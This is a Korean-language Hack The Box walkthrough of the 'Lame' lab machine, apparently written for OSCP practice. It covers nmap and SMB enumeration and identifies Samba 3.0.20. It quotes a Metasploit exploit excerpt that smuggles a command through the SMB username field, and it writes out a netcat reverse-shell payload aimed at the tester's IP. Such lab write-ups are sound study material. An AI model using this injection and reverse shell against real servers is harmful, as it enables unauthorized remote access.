HTB - Lame 풀이

Hack The Box. OSCP 시험 대비로 풀어보려고 등록했는데, 현재는 다른 문제들도 쭉 풀어 보고 있는 중이다.

블로그에는 walkthrough 방식으로 정리해서 올릴 예정

 

[Lame / Linux / Easy]

 

sudo nmap -v -Pn -p- 10.10.10.3
sudo nmap -v -sC -sV 10.10.10.3

 

 

sudo nmap -v --script smb* 10.10.10.3

smbclient 를 통해서 \tmp 폴더 안의 파일들도 받아볼 수 있지만 쓸만한 정보는 없었다.

 

Samba 3.0.20-Debian

 

searchsploit -x 16320.rb

...
...
		def exploit

                connect

                # lol?
                username = "/=`nohup " + payload.encoded + "`"
                begin
                        simple.client.negotiate(false)
                        simple.client.session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'], false)
                rescue ::Timeout::Error, XCEPT::LoginError
                        # nothing, it either worked or it didn't ;)
                end

                handler
        end
...
...

"/=`nohup nc -e /bin/sh 10.10.14.12 443`"

username 을 명령어로 집어넣으면서 exploit 하는 것을 확인 할 수 있다.

 

이전에 확인한 공유 폴더에 접속하여 "logon" 명령어를 통해 username 변경을 시도하였다.